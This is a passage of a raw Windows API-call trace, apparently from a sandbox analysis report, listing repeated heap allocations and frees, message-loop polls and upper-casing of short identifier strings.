RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0206.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0206.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0206.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0206.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0206.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.009] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0206.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0206.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0206.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0206.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0206.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0206.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0206.011] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa948 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0206.011] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0206.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0206.011] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0206.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0206.012] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0206.012] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0206.012] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaad08 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0206.012] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0206.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0206.012] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0206.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0206.013] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0206.013] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0206.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0206.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0206.014] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0206.014] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0206.014] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaabd0 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0206.014] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0206.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0206.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0206.015] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0206.015] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0206.015] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0206.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0206.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.016] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0206.016] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: 